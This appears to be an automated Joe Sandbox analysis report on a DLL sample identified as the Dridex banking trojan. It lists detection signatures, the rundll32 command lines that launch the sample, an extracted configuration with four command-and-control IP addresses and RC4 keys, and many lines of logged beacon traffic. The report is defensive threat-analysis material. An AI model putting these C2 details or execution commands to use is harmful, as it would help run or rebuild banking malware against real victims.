Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.19803.14094

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.19803.14094 (renamed file extension from 14094 to dll)
Analysis ID:510692
MD5:617b1fd1bfdab72e5562c0c2f7600bcb
SHA1:9e5bf19ba51cbd5849a225f022b939a48e5769b3
SHA256:9b9c38d267cedfb2c423fbad71a50f76d0743a3ecc8f6027029fa13ea36e00e4
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6508 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6540 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6556 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3312 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5364 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.838096083.000000006E651000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000004.00000003.417154756.0000000003200000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000006.00000003.439012632.0000000002D50000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000004.00000002.869577587.000000006E651000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000005.00000003.431444346.0000000004DA0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.53db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              0.3.loaddll32.exe.104db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                6.3.rundll32.exe.2d6db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  4.3.rundll32.exe.321db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    4.2.rundll32.exe.6e650000.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.3.loaddll32.exe.104db55.0.raw.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllVirustotal: Detection: 7%Perma Link
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.845974920.000000006E717000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.888666799.000000006E717000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.19803.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.3:49748 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.3:49751 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.3:49753 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
